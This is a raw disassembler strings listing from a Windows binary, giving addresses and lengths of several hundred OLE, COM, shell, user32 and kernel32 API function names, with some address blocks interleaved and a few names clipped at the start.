.text:004197BC 00000024 C StgOpenAsyncDocfileOnIFillLockBytes
.text:004197E0 00000017 C StgIsStorageILockBytes
.text:004197F8 00000011 C StgIsStorageFile
.text:0041980C 00000021 C StgGetIFillLockBytesOnILockBytes
.text:00419830 0000001B C StgGetIFillLockBytesOnFile
.text:0041984C 00000013 C StgCreateStorageEx
.text:00419860 0000001D C StgCreateDocfileOnILockBytes
.text:00419880 00000011 C StgCreateDocfile
.text:00419894 00000012 C SetDocumentBitStg
.text:004198A8 0000000E C SetConvertStg
.text:004198B8 0000000F C RevokeDragDrop
.text:004198C8 00000011 C ReleaseStgMedium
.text:004198DC 00000011 C RegisterDragDrop
.text:004198F0 00000011 C ReadStringStream
.text:00419904 0000000B C ReadOleStg
.text:00419910 00000013 C ReadFmtUserTypeStg
.text:00419924 0000000D C ReadClassStm
.text:00419934 0000000D C ReadClassStg
.text:00419944 00000010 C PropVariantCopy
.text:00419954 00000011 C PropVariantClear
.text:00419968 00000010 C ProgIDFromCLSID
.text:00419978 00000013 C OpenOrCreateStream
.text:0041998C 00000010 C OleUninitialize
.text:0041999C 00000018 C OleTranslateAccelerator
.text:004199B4 00000015 C OleSetMenuDescriptor
.text:004199CC 00000016 C OleSetContainedObject
.text:004199E4 00000010 C OleSetClipboard
.text:004199F4 00000012 C OleSetAutoConvert
.text:00419A08 00000010 C OleSaveToStream
.text:00419A18 00000008 C OleSave
.text:00419A20 00000007 C OleRun
.text:00419A28 00000012 C OleRegGetUserType
.text:00419A3C 00000014 C OleRegGetMiscStatus
.text:00419A50 00000010 C OleRegEnumVerbs
.text:00419A60 00000014 C OleRegEnumFormatEtc
.text:00419A74 00000015 C OleQueryLinkFromData
.text:00419A8C 00000017 C OleQueryCreateFromData
.text:00419AA4 00000015 C OleNoteObjectVisible
.text:0041EC2C 00000013 C SHRegQueryUSValueW
.text:0041EC40 00000013 C SHRegQueryUSValueA
.text:0041EC54 00000015 C SHRegQueryInfoUSKeyW
.text:0041EC6C 00000015 C SHRegQueryInfoUSKeyA
.text:0041EC84 00000010 C SHRegOpenUSKeyW
.text:0041EC94 00000010 C SHRegOpenUSKeyA
.text:0041ECA4 00000011 C SHRegGetUSValueW
.text:0041ECB8 00000011 C SHRegGetUSValueA
.text:0041ECCC 00000015 C SHRegGetBoolUSValueW
.text:0041ECE4 00000015 C SHRegGetBoolUSValueA
.text:0041ECFC 00000012 C SHRegEnumUSValueW
.text:0041ED10 00000012 C SHRegEnumUSValueA
.text:0041ED24 00000010 C SHRegEnumUSKeyW
.text:0041ED34 00000010 C SHRegEnumUSKeyA
.text:0041ED44 00000013 C SHRegDuplicateHKey
.text:0041ED58 00000014 C SHRegDeleteUSValueW
.text:0041ED6C 00000014 C SHRegDeleteUSValueA
.text:0041ED80 00000017 C SHRegDeleteEmptyUSKeyW
.text:0041ED98 00000017 C SHRegDeleteEmptyUSKeyA
.text:0041EDB0 00000012 C SHRegCreateUSKeyW
.text:0041EDC4 00000012 C SHRegCreateUSKeyA
.text:0041EDD8 00000010 C SHRegCloseUSKey
.text:0041EDE8 00000010 C SHQueryValueExW
.text:0041EDF8 00000010 C SHQueryValueExA
.text:0041EE08 00000010 C SHQueryInfoKeyW
.text:0041EE18 00000010 C SHQueryInfoKeyA
.text:0041EE28 00000011 C SHOpenRegStreamW
.text:0041EE3C 00000011 C SHOpenRegStreamA
.text:0041EE50 00000012 C SHOpenRegStream2W
.text:0041EE64 00000012 C SHOpenRegStream2A
.text:0041EE78 00000015 C SHIsLowMemoryMachine
.text:0041EE90 0000000C C SHGetValueW
.text:0041EE9C 0000000C C SHGetValueA
.text:0041EEA8 0000000F C SHGetThreadRef
.text:0041EEB8 00000011 C SHGetInverseCMAP
.text:0041EECC 0000000D C SHEnumValueW
.text:0041EEDC 0000000D C SHEnumValueA
.text:0041EEEC 0000000D C SHEnumKeyExW
.text:0041EEFC 0000000D C SHEnumKeyExA
.text:0041EF0C 0000000F C SHDeleteValueW
.text:0041EF1C 0000000F C SHDeleteValueA
.text:0041EF2C 0000000D C SHDeleteKeyW
.text:0041EF3C 0000000D C SHDeleteKeyA
.text:0041EF4C 00000012 C SHDeleteEmptyKeyW
.text:0041EF60 00000012 C SHDeleteEmptyKeyA
.text:0041EF74 00000016 C SHCreateStreamOnFileW
.text:0041EF8C 00000016 C SHCreateStreamOnFileA
.text:0041EFA4 00000015 C SHCreateShellPalette
.text:0041EFBC 0000000B C SHCopyKeyW
.text:0041EFC8 0000000B C SHCopyKeyA
.text:0041EFD4 0000000F C SHAutoComplete
.text:0041EFE4 00000013 C PathUnquoteSpacesW
.text:0041EFF8 00000013 C PathUnquoteSpacesA
.text:0041F00C 00000018 C PathUnmakeSystemFolderW
.text:0041F024 00000018 C PathUnmakeSystemFolderA
.text:0041F03C 00000010 C PathUndecorateW
.text:0041F04C 00000010 C PathUndecorateA
.text:0041F05C 00000011 C PathStripToRootW
.text:0041F070 00000011 C PathStripToRootA
.text:0041F084 0000000F C PathStripPathW
.text:0041F094 0000000F C PathStripPathA
.text:0041F0A4 0000000E C PathSkipRootW
.text:0041F0B4 0000000E C PathSkipRootA
.text:0041F0C4 00000014 C PathSetDlgItemPathW
.text:0041F0D8 00000014 C PathSetDlgItemPathA
.text:0041F0EC 00000016 C PathSearchAndQualifyW
.text:0041F104 00000016 C PathSearchAndQualifyA
.text:0041F11C 00000015 C PathRenameExtensionW
.text:0041F134 00000015 C PathRenameExtensionA
.text:0041F14C 00000014 C PathRemoveFileSpecW
.text:00419ABC 00000020 C OleMetafilePictFromIconAndLabel
.text:00419ADC 0000000F C OleLockRunning
.text:00419AEC 00000012 C OleLoadFromStream
.text:00419B00 00000008 C OleLoad
.text:00419B08 0000000D C OleIsRunning
.text:00419B18 00000016 C OleIsCurrentClipboard
.text:00419B30 0000000E C OleInitialize
.text:00419B40 00000011 C OleGetIconOfFile
.text:00419B54 00000012 C OleGetIconOfClass
.text:00419B68 00000010 C OleGetClipboard
.text:00419B78 00000012 C OleGetAutoConvert
.text:00419B8C 00000012 C OleFlushClipboard
.text:00419BA0 00000011 C OleDuplicateData
.text:00419BB4 00000008 C OleDraw
.text:00419BBC 00000011 C OleDoAutoConvert
.text:00419BD0 00000019 C OleDestroyMenuDescriptor
.text:00419BEC 00000018 C OleCreateStaticFromData
.text:00419C04 00000018 C OleCreateMenuDescriptor
.text:00419C1C 00000016 C OleCreateLinkToFileEx
.text:00419C34 00000014 C OleCreateLinkToFile
.text:00419C48 00000018 C OleCreateLinkFromDataEx
.text:00419C60 00000016 C OleCreateLinkFromData
.text:00419C78 00000010 C OleCreateLinkEx
.text:00419C88 0000000E C OleCreateLink
.text:00419C98 00000014 C OleCreateFromFileEx
.text:00419CAC 00000012 C OleCreateFromFile
.text:00419CC0 00000014 C OleCreateFromDataEx
.text:00419CD4 00000012 C OleCreateFromData
.text:00419CE8 0000000C C OleCreateEx
.text:00419CF4 00000019 C OleCreateEmbeddingHelper
.text:00419D10 00000018 C OleCreateDefaultHandler
.text:00419D28 0000000A C OleCreate
.text:00419D34 00000020 C OleConvertOLESTREAMToIStorageEx
.text:00419D54 0000001E C OleConvertOLESTREAMToIStorage
.text:00419D74 00000020 C OleConvertIStorageToOLESTREAMEx
.text:00419D94 0000001E C OleConvertIStorageToOLESTREAM
.text:00419DB4 00000010 C OleBuildVersion
.text:00419DC4 00000016 C MonikerRelativePathTo
.text:00419DDC 00000018 C MonikerCommonPrefixWith
.text:00419DF4 00000013 C MkParseDisplayName
.text:00419E08 0000000C C IsEqualGUID
.text:00419E14 0000000E C IsAccelerator
.text:00419E24 0000000E C IIDFromString
.text:00419E34 00000016 C GetRunningObjectTable
.text:00419E4C 00000011 C GetHookInterface
.text:00419E60 00000015 C GetHGlobalFromStream
.text:00419E78 00000019 C GetHGlobalFromILockBytes
.text:00419E94 00000012 C GetDocumentBitStg
.text:00419EA8 0000000E C GetConvertStg
.text:00419EB8 0000000D C GetClassFile
.text:00419EC8 00000015 C FreePropVariantArray
.text:00419EE0 00000011 C EnableHookObject
.text:00419EF4 0000000B C DoDragDrop
.text:00419F00 00000016 C DllDebugObjectRPCHook
.text:00419F18 00000016 C CreateStreamOnHGlobal
.text:00419F30 00000015 C CreatePointerMoniker
.text:00419F48 00000016 C CreateOleAdviseHolder
.text:00419F60 00000014 C CreateObjrefMoniker
.text:00419F74 00000012 C CreateItemMoniker
.text:00419F88 0000001A C CreateILockBytesOnHGlobal
.text:00419FA4 00000017 C CreateGenericComposite
.text:00419FBC 00000012 C CreateFileMoniker
.text:00419FD0 00000010 C CreateDataCache
.text:00419FE0 00000017 C CreateDataAdviseHolder
.text:00419FF8 00000013 C CreateClassMoniker
.text:0041A00C 0000000E C CreateBindCtx
.text:0041A01C 00000012 C CreateAntiMoniker
.text:0041A030 00000015 C CoUnmarshalInterface
.text:0041A048 00000013 C CoUnmarshalHresult
.text:0041A05C 0000000F C CoUninitialize
.text:0041F160 00000014 C PathRemoveFileSpecA
.text:0041F174 00000015 C PathRemoveExtensionW
.text:0041F18C 00000015 C PathRemoveExtensionA
.text:0041F1A4 00000012 C PathRemoveBlanksW
.text:0041F1B8 00000012 C PathRemoveBlanksA
.text:0041F1CC 00000015 C PathRemoveBackslashW
.text:0041F1E4 00000015 C PathRemoveBackslashA
.text:0041F1FC 00000010 C PathRemoveArgsW
.text:0041F20C 00000010 C PathRemoveArgsA
.text:0041F21C 00000014 C PathRelativePathToW
.text:0041F230 00000014 C PathRelativePathToA
.text:0041F244 00000011 C PathQuoteSpacesW
.text:0041F258 00000011 C PathQuoteSpacesA
.text:0041F26C 00000017 C PathParseIconLocationW
.text:0041F284 00000017 C PathParseIconLocationA
.text:0041F29C 0000000F C PathMatchSpecW
.text:0041F2AC 0000000F C PathMatchSpecA
.text:0041F2BC 00000016 C PathMakeSystemFolderW
.text:0041F2D4 00000016 C PathMakeSystemFolderA
.text:0041F2EC 00000010 C PathMakePrettyW
.text:0041F2FC 00000010 C PathMakePrettyA
.text:0041F30C 0000000B C PathIsURLW
.text:0041F318 0000000B C PathIsURLA
.text:0041F324 0000000B C PathIsUNCW
.text:0041F330 00000011 C PathIsUNCServerW
.text:0041F344 00000016 C PathIsUNCServerShareW
.text:0041F35C 00000016 C PathIsUNCServerShareA
.text:0041F374 00000011 C PathIsUNCServerA
.text:0041F388 0000000B C PathIsUNCA
.text:0041F394 00000014 C PathIsSystemFolderW
.text:0041F3A8 00000014 C PathIsSystemFolderA
.text:0041F3BC 00000010 C PathIsSameRootW
.text:0041F3CC 00000010 C PathIsSameRootA
.text:0041F3DC 0000000C C PathIsRootW
.text:0041F3E8 0000000C C PathIsRootA
.text:0041F3F4 00000010 C PathIsRelativeW
.text:0041F404 00000010 C PathIsRelativeA
.text:0041F414 0000000E C PathIsPrefixW
.text:0041F424 0000000E C PathIsPrefixA
.text:0041F434 00000013 C PathIsNetworkPathW
.text:0041F448 00000013 C PathIsNetworkPathA
.text:0041F45C 00000013 C PathIsLFNFileSpecW
.text:0041F470 00000013 C PathIsLFNFileSpecA
.text:0041F484 00000010 C PathIsFileSpecW
.text:0041F494 00000010 C PathIsFileSpecA
.text:0041F4A4 00000011 C PathIsDirectoryW
.text:0041F4B8 00000016 C PathIsDirectoryEmptyW
.text:0041F4D0 00000016 C PathIsDirectoryEmptyA
.text:0041F4E8 00000011 C PathIsDirectoryA
.text:0041F4FC 00000013 C PathIsContentTypeW
.text:0041F510 00000013 C PathIsContentTypeA
.text:0041F524 00000014 C PathGetDriveNumberW
.text:0041F538 00000014 C PathGetDriveNumberA
.text:0041F54C 00000011 C PathGetCharTypeW
.text:0041F560 00000011 C PathGetCharTypeA
.text:0041F574 0000000D C PathGetArgsW
.text:0041F584 0000000D C PathGetArgsA
.text:0041F594 00000015 C PathFindSuffixArrayW
.text:0041F5AC 00000015 C PathFindSuffixArrayA
.text:0041F5C4 00000010 C PathFindOnPathW
.text:0041F5D4 00000010 C PathFindOnPathA
.text:0041F5E4 00000017 C PathFindNextComponentW
.text:0041F5FC 00000017 C PathFindNextComponentA
.text:0041F614 00000012 C PathFindFileNameW
.text:0041F628 00000012 C PathFindFileNameA
.text:0041F63C 00000013 C PathFindExtensionW
.text:0041F650 00000013 C PathFindExtensionA
.text:0041F664 00000010 C PathFileExistsW
.text:0041F674 00000010 C PathFileExistsA
.text:0041F684 00000013 C PathCreateFromUrlW
.text:0041A06C 0000000F C CoTreatAsClass
.text:0041A07C 00000011 C CoTaskMemRealloc
.text:0041A090 0000000E C CoTaskMemFree
.text:0041A0A0 0000000F C CoTaskMemAlloc
.text:0041A0B0 00000014 C CoSwitchCallContext
.text:0041A0C4 00000016 C CoSuspendClassObjects
.text:0041A0DC 00000012 C CoSetProxyBlanket
.text:0041A0F0 00000012 C CoRevokeMallocSpy
.text:0041A104 00000014 C CoRevokeClassObject
.text:0041A118 0000000F C CoRevertToSelf
.text:0041A128 00000015 C CoResumeClassObjects
.text:0041A140 00000017 C CoReleaseServerProcess
.text:0041A158 00000015 C CoReleaseMarshalData
.text:0041A170 00000014 C CoRegisterSurrogate
.text:0041A184 00000012 C CoRegisterPSClsid
.text:0041A198 00000018 C CoRegisterMessageFilter
.text:0041A1B0 00000014 C CoRegisterMallocSpy
.text:0041A1C4 00000016 C CoRegisterClassObject
.text:0041A1DC 00000016 C CoRegisterChannelHook
.text:0041A1F4 00000015 C CoQueryReleaseObject
.text:0041A20C 00000014 C CoQueryProxyBlanket
.text:0041A220 00000015 C CoQueryClientBlanket
.text:0041A238 0000001E C CoQueryAuthenticationServices
.text:0041A258 00000013 C CoMarshalInterface
.text:0041A26C 00000026 C CoMarshalInterThreadInterfaceInStream
.text:0041A294 00000011 C CoMarshalHresult
.text:0041A2A8 00000015 C CoLockObjectExternal
.text:0041A2C0 0000000E C CoLoadLibrary
.text:0041A2D0 0000000E C CoIsOle1Class
.text:0041A2E0 00000015 C CoIsHandlerConnected
.text:0041A2F8 00000015 C CoInitializeSecurity
.text:0041A310 0000000F C CoInitializeEx
.text:0041A320 0000000D C CoInitialize
.text:0041A330 00000014 C CoImpersonateClient
.text:0041A344 00000012 C CoGetTreatAsClass
.text:0041A358 00000015 C CoGetStandardMarshal
.text:0041A370 0000000D C CoGetPSClsid
.text:0041A380 0000000C C CoGetObject
.text:0041A38C 00000014 C CoGetMarshalSizeMax
.text:0041A3A0 0000000C C CoGetMalloc
.text:0041A3AC 0000001F C CoGetInterfaceAndReleaseStream
.text:0041A3CC 0000001A C CoGetInstanceFromIStorage
.text:0041A3E8 00000016 C CoGetInstanceFromFile
.text:0041A400 00000014 C CoGetCurrentProcess
.text:0041A414 0000001C C CoGetCurrentLogicalThreadId
.text:0041A430 00000011 C CoGetClassObject
.text:0041A444 0000000F C CoGetCallerTID
.text:0041A454 00000011 C CoGetCallContext
.text:0041A468 00000016 C CoFreeUnusedLibraries
.text:0041A480 0000000E C CoFreeLibrary
.text:0041A490 00000013 C CoFreeAllLibraries
.text:0041A4A4 00000018 C CoFileTimeToDosDateTime
.text:0041A4BC 0000000E C CoFileTimeNow
.text:0041A4CC 00000018 C CoDosDateTimeToFileTime
.text:0041A4E4 00000013 C CoDisconnectObject
.text:0041A4F8 00000013 C CoCreateInstanceEx
.text:0041A50C 00000011 C CoCreateInstance
.text:0041A520 0000000D C CoCreateGuid
.text:0041A530 0000001E C CoCreateFreeThreadedMarshaler
.text:0041A550 0000000C C CoCopyProxy
.text:0041A55C 0000000F C CoBuildVersion
.text:0041A56C 00000016 C CoAddRefServerProcess
.text:0041A584 00000010 C CLSIDFromString
.text:0041A594 00000010 C CLSIDFromProgID
.text:0041A5A4 0000000C C BindMoniker
.text:0041A5B0 00000010 C WindowFromPoint
.text:0041A5C0 0000000D C WindowFromDC
.text:0041A5D0 00000009 C WinHelpW
.text:0041A5DC 00000009 C WinHelpA
.text:0041A5E8 0000000C C WaitMessage
.text:0041F698 00000013 C PathCreateFromUrlA
.text:0041F6AC 00000011 C PathCompactPathW
.text:0041F6C0 00000013 C PathCompactPathExW
.text:0041F6D4 00000013 C PathCompactPathExA
.text:0041F6E8 00000011 C PathCompactPathA
.text:0041F6FC 00000012 C PathCommonPrefixW
.text:0041F710 00000012 C PathCommonPrefixA
.text:0041F724 0000000D C PathCombineW
.text:0041F734 0000000D C PathCombineA
.text:0041F744 00000012 C PathCanonicalizeW
.text:0041F758 00000012 C PathCanonicalizeA
.text:0041F76C 0000000F C PathBuildRootW
.text:0041F77C 0000000F C PathBuildRootA
.text:0041F78C 0000000C C PathAppendW
.text:0041F798 0000000C C PathAppendA
.text:0041F7A4 00000012 C PathAddExtensionW
.text:0041F7B8 00000012 C PathAddExtensionA
.text:0041F7CC 00000012 C PathAddBackslashW
.text:0041F7E0 00000012 C PathAddBackslashA
.text:0041F7F4 00000011 C IntlStrEqWorkerW
.text:0041F808 00000011 C IntlStrEqWorkerA
.text:0041F81C 00000009 C HashData
.text:0041F828 00000011 C GetMenuPosFromID
.text:0041F83C 0000000E C ColorRGBToHLS
.text:0041F84C 0000000E C ColorHLSToRGB
.text:0041F85C 00000010 C ColorAdjustLuma
.text:0041F86C 00000009 C ChrCmpIW
.text:0041F878 00000009 C ChrCmpIA
.text:0041F884 00000012 C AssocQueryStringW
.text:0041F898 00000017 C AssocQueryStringByKeyW
.text:0041F8B0 00000017 C AssocQueryStringByKeyA
.text:0041F8C8 00000012 C AssocQueryStringA
.text:0041F8DC 0000000F C AssocQueryKeyW
.text:0041F8EC 0000000F C AssocQueryKeyA
.text:0041F8FC 00000009 C lstrlenW
.text:0041F908 00000009 C lstrlenA
.text:0041F914 00000008 C lstrlen
.text:0041F91C 0000000A C lstrcpynW
.text:0041F928 0000000A C lstrcpynA
.text:0041F934 00000009 C lstrcpyn
.text:0041F940 00000009 C lstrcpyW
.text:0041F94C 00000009 C lstrcpyA
.text:0041F958 00000008 C lstrcpy
.text:0041F960 0000000A C lstrcmpiW
.text:0041F96C 0000000A C lstrcmpiA
.text:0041F978 00000009 C lstrcmpi
.text:0041F984 00000009 C lstrcmpW
.text:0041F990 00000009 C lstrcmpA
.text:0041F99C 00000008 C lstrcmp
.text:0041F9A4 00000009 C lstrcatW
.text:0041F9B0 00000009 C lstrcatA
.text:0041F9BC 00000008 C lstrcat
.text:0041F9C4 0000000E C WriteTapemark
.text:0041F9D4 00000014 C WriteProfileStringW
.text:0041F9E8 00000014 C WriteProfileStringA
.text:0041F9FC 00000015 C WriteProfileSectionW
.text:0041FA14 00000015 C WriteProfileSectionA
.text:0041FA2C 00000013 C WriteProcessMemory
.text:0041FA40 0000001B C WritePrivateProfileStructW
.text:0041FA5C 0000001B C WritePrivateProfileStructA
.text:0041FA78 0000001B C WritePrivateProfileStringW
.text:0041FA94 0000001B C WritePrivateProfileStringA
.text:0041FAB0 0000001C C WritePrivateProfileSectionW
.text:0041FACC 0000001C C WritePrivateProfileSectionA
.text:0041FAE8 00000010 C WriteFileGather
.text:0041FAF8 0000000C C WriteFileEx
.text:0041FB04 0000000A C WriteFile
.text:0041FB10 0000000E C WriteConsoleW
.text:0041FB20 00000014 C WriteConsoleOutputW
.text:0041FB34 0000001D C WriteConsoleOutputCharacterW
.text:0041A5F4 00000011 C WaitForInputIdle
.text:0041A608 00000013 C WINNLSGetIMEHotkey
.text:0041A61C 00000016 C WINNLSGetEnableStatus
.text:0041A634 00000010 C WINNLSEnableIME
.text:0041A644 0000000B C VkKeyScanW
.text:0041A650 0000000D C VkKeyScanExW
.text:0041A660 0000000D C VkKeyScanExA
.text:0041A670 0000000B C VkKeyScanA
.text:0041A67C 0000000C C ValidateRgn
.text:0041A688 0000000D C ValidateRect
.text:0041A698 0000000D C UpdateWindow
.text:0041A6A8 00000011 C UnregisterHotKey
.text:0041A6BC 0000001D C UnregisterDeviceNotification
.text:0041A6DC 00000011 C UnregisterClassW
.text:0041A6F0 00000011 C UnregisterClassA
.text:0041A704 00000010 C UnpackDDElParam
.text:0041A714 00000015 C UnloadKeyboardLayout
.text:0041A72C 0000000A C UnionRect
.text:0041A738 00000014 C UnhookWindowsHookEx
.text:0041A74C 00000012 C UnhookWindowsHook
.text:0041A760 0000000F C UnhookWinEvent
.text:0041A770 00000011 C TranslateMessage
.text:0041A784 00000015 C TranslateMDISysAccel
.text:0041A79C 00000016 C TranslateAcceleratorW
.text:0041A7B4 00000016 C TranslateAcceleratorA
.text:0041A7CC 00000015 C TranslateAccelerator
.text:0041A7E4 00000011 C TrackPopupMenuEx
.text:0041A7F8 0000000F C TrackPopupMenu
.text:0041A808 00000010 C TrackMouseEvent
.text:0041A818 0000000C C ToUnicodeEx
.text:0041A824 0000000A C ToUnicode
.text:0041A830 0000000A C ToAsciiEx
.text:0041A83C 00000008 C ToAscii
.text:0041A844 0000000C C TileWindows
.text:0041A850 00000011 C TileChildWindows
.text:0041A864 0000000F C TabbedTextOutW
.text:0041A874 0000000F C TabbedTextOutA
.text:0041A884 00000016 C SystemParametersInfoW
.text:0041A89C 00000016 C SystemParametersInfoA
.text:0041A8B4 00000013 C SwitchToThisWindow
.text:0041A8C8 0000000E C SwitchDesktop
.text:0041A8D8 00000010 C SwapMouseButton
.text:0041A8E8 0000000D C SubtractRect
.text:0041A8F8 00000010 C ShowWindowAsync
.text:0041A908 0000000B C ShowWindow
.text:0041A914 0000000E C ShowScrollBar
.text:0041A925 0000000F C howOwnedPopups
.text:0041A934 0000000B C ShowCursor
.text:0041A940 0000000A C ShowCaret
.text:0041A94C 00000010 C SetWindowsHookW
.text:0041A95C 00000012 C SetWindowsHookExW
.text:0041A970 00000012 C SetWindowsHookExA
.text:0041A984 00000010 C SetWindowsHookA
.text:0041A994 0000000E C SetWindowWord
.text:0041A9A4 0000000F C SetWindowTextW
.text:0041A9B4 0000000F C SetWindowTextA
.text:0041A9C4 0000000D C SetWindowRgn
.text:0041A9D4 0000000D C SetWindowPos
.text:0041A9E4 00000013 C SetWindowPlacement
.text:0041A9F8 0000000F C SetWindowLongW
.text:0041AA08 0000000F C SetWindowLongA
.text:0041AA18 00000017 C SetWindowContextHelpId
.text:0041AA30 00000010 C SetWinEventHook
.text:0041AA40 00000016 C SetUserObjectSecurity
.text:0041AA58 0000001A C SetUserObjectInformationW
.text:0041AA74 0000001A C SetUserObjectInformationA
.text:0041AA90 00000009 C SetTimer
.text:0041AA9C 00000011 C SetThreadDesktop
.text:0041AAB0 00000010 C SetSystemCursor
.text:0041AAC0 0000000D C SetSysColors
.text:0041FB54 0000001D C WriteConsoleOutputCharacterA
.text:0041FB74 0000001C C WriteConsoleOutputAttribute
.text:0041FB90 00000014 C WriteConsoleOutputA
.text:0041FBA4 00000013 C WriteConsoleInputW
.text:0041FBB8 00000013 C WriteConsoleInputA
.text:0041FBCC 0000000E C WriteConsoleA
.text:0041FBDC 00000008 C WinExec
.text:0041FBE4 00000014 C WideCharToMultiByte
.text:0041FBF8 0000000F C WaitNamedPipeW
.text:0041FC08 0000000F C WaitNamedPipeA
.text:0041FC18 00000016 C WaitForSingleObjectEx
.text:0041FC30 00000014 C WaitForSingleObject
.text:0041FC44 00000019 C WaitForMultipleObjectsEx
.text:0041FC60 00000017 C WaitForMultipleObjects
.text:0041FC78 00000012 C WaitForDebugEvent
.text:0041FC8C 0000000E C WaitCommEvent
.text:0041FC9C 0000000E C VirtualUnlock
.text:0041FCAC 0000000F C VirtualQueryEx
.text:0041FCBC 0000000D C VirtualQuery
.text:0041FCCC 00000011 C VirtualProtectEx
.text:0041FCE0 0000000F C VirtualProtect
.text:0041FCF0 0000000C C VirtualLock
.text:0041FCFC 0000000E C VirtualFreeEx
.text:0041FD0C 0000000C C VirtualFree
.text:0041FD18 0000000F C VirtualAllocEx
.text:0041FD28 0000000D C VirtualAlloc
.text:0041FD38 00000011 C VerLanguageNameW
.text:0041FD4C 00000011 C VerLanguageNameA
.text:0041FD60 00000010 C UpdateResourceW
.text:0041FD70 00000010 C UpdateResourceA
.text:0041FD80 00000010 C UnmapViewOfFile
.text:0041FD90 0000000D C UnlockFileEx
.text:0041FDA0 0000000B C UnlockFile
.text:0041FDAC 00000019 C UnhandledExceptionFilter
.text:0041FDC8 00000011 C TransmitCommChar
.text:0041FDDC 00000012 C TransactNamedPipe
.text:0041FDF0 0000001C C Toolhelp32ReadProcessMemory
.text:0041FE0C 0000000C C TlsSetValue
.text:0041FE18 0000000C C TlsGetValue
.text:0041FE24 00000008 C TlsFree
.text:0041FE2C 00000009 C TlsAlloc
.text:0041FE38 0000000D C Thread32Next
.text:0041FE48 0000000E C Thread32First
.text:0041FE58 00000010 C TerminateThread
.text:0041FE68 00000011 C TerminateProcess
.text:0041FE7C 00000020 C SystemTimeToTzSpecificLocalTime
.text:0041FE9C 00000015 C SystemTimeToFileTime
.text:0041FEB4 0000000F C SwitchToThread
.text:0041FEC4 0000000E C SwitchToFiber
.text:0041FED4 0000000E C SuspendThread
.text:0041FEE4 00000008 C SleepEx
.text:0041FEEC 00000006 C Sleep
.text:0041FEF4 0000000F C SizeofResource
.text:0041FF04 00000014 C SignalObjectAndWait
.text:0041FF18 0000000A C SetupComm
.text:0041FF24 00000011 C SetWaitableTimer
.text:0041FF38 00000010 C SetVolumeLabelW
.text:0041FF48 00000010 C SetVolumeLabelA
.text:0041FF58 0000001C C SetUnhandledExceptionFilter
.text:0041FF74 00000017 C SetTimeZoneInformation
.text:0041FF8C 00000017 C SetThreadPriorityBoost
.text:0041FFA4 00000012 C SetThreadPriority
.text:0041FFB8 00000010 C SetThreadLocale
.text:0041FFC8 00000018 C SetThreadIdealProcessor
.text:0041FFE0 00000018 C SetThreadExecutionState
.text:0041FFF8 00000011 C SetThreadContext
.text:0042000C 00000016 C SetThreadAffinityMask
.text:00420024 00000010 C SetTapePosition
.text:00420034 00000012 C SetTapeParameters
.text:00420048 00000018 C SetSystemTimeAdjustment
.text:0041AAD0 0000000F C SetShellWindow
.text:0041AAE0 0000000F C SetScrollRange
.text:0041AAF1 0000000C C etScrollPos
.text:0041AB00 0000000E C SetScrollInfo
.text:0041AB10 0000000D C SetRectEmpty
.text:0041AB20 00000008 C SetRect
.text:0041AB28 00000009 C SetPropW
.text:0041AB34 00000009 C SetPropA
.text:0041AB40 00000018 C SetProcessWindowStation
.text:0041AB59 00000017 C etProcessDefaultLayout
.text:0041AB70 0000000A C SetParent
.text:0041AB7C 00000010 C SetMessageQueue
.text:0041AB8C 00000014 C SetMessageExtraInfo
.text:0041ABA0 00000011 C SetMenuItemInfoW
.text:0041ABB5 00000010 C etMenuItemInfoA
.text:0041ABC8 00000013 C SetMenuItemBitmaps
.text:0041ABDC 0000000C C SetMenuInfo
.text:0041ABE8 00000013 C SetMenuDefaultItem
.text:0041ABFC 00000015 C SetMenuContextHelpId
.text:0041AC14 00000008 C SetMenu
.text:0041AC1C 0000000F C SetLastErrorEx
.text:0041AC2C 00000011 C SetKeyboardState
.text:0041AC40 00000014 C SetForegroundWindow
.text:0041AC54 00000009 C SetFocus
.text:0041AC60 00000013 C SetDoubleClickTime
.text:0041AC74 00000010 C SetDlgItemTextW
.text:0041AC84 00000010 C SetDlgItemTextA
.text:0041AC94 0000000E C SetDlgItemInt
.text:0041ACA4 00000011 C SetDeskWallpaper
.text:0041ACB8 00000013 C SetDebugErrorLevel
.text:0041ACCC 0000000D C SetCursorPos
.text:0041ACDC 0000000A C SetCursor
.text:0041ACE8 00000013 C SetClipboardViewer
.text:0041ACFC 00000011 C SetClipboardData
.text:0041AD10 0000000D C SetClassWord
.text:0041AD20 0000000E C SetClassLongW
.text:0041AD30 0000000E C SetClassLongA
.text:0041AD40 0000000C C SetCaretPos
.text:0041AD4C 00000012 C SetCaretBlinkTime
.text:0041AD60 0000000B C SetCapture
.text:0041AD6C 00000010 C SetActiveWindow
.text:0041AD7C 00000013 C SendNotifyMessageW
.text:0041AD90 00000013 C SendNotifyMessageA
.text:0041ADA4 0000000D C SendMessageW
.text:0041ADB4 00000014 C SendMessageTimeoutW
.text:0041ADC8 00000014 C SendMessageTimeoutA
.text:0041ADDC 00000015 C SendMessageCallbackW
.text:0041ADF4 00000015 C SendMessageCallbackA
.text:0041AE0C 0000000D C SendMessageA
.text:0041AE1C 0000000A C SendInput
.text:0041AE28 00000012 C SendIMEMessageExW
.text:0041AE3C 00000012 C SendIMEMessageExA
.text:0041AE50 00000014 C SendDlgItemMessageW
.text:0041AE64 00000014 C SendDlgItemMessageA
.text:0041AE78 0000000F C ScrollWindowEx
.text:0041AE88 0000000D C ScrollWindow
.text:0041AE98 00000009 C ScrollDC
.text:0041AEA4 0000000F C ScreenToClient
.text:0041AEB4 0000000F C ReuseDDElParam
.text:0041AEC4 0000000D C ReplyMessage
.text:0041AED4 0000000C C RemovePropW
.text:0041AEE0 0000000C C RemovePropA
.text:0041AEEC 0000000B C RemoveMenu
.text:0041AEF8 0000000A C ReleaseDC
.text:0041AF04 0000000F C ReleaseCapture
.text:0041AF14 00000017 C RegisterWindowMessageW
.text:0041AF2C 00000017 C RegisterWindowMessageA
.text:0041AF44 0000000F C RegisterHotKey
.text:0041AF54 0000001C C RegisterDeviceNotificationW
.text:0041AF70 0000001C C RegisterDeviceNotificationA
.text:00420060 0000000E C SetSystemTime
.text:00420070 00000014 C SetSystemPowerState
.text:00420084 0000000D C SetStdHandle
.text:00420094 00000019 C SetProcessWorkingSetSize
.text:004200B0 0000001D C SetProcessShutdownParameters
.text:004200D0 00000018 C SetProcessPriorityBoost
.text:004200E8 00000017 C SetProcessAffinityMask
.text:00420100 00000011 C SetPriorityClass
.text:00420114 00000018 C SetNamedPipeHandleState
.text:0042012C 0000001B C SetMessageWaitingIndicator
.text:00420148 00000010 C SetMailslotInfo
.text:00420158 0000000F C SetLocaleInfoW
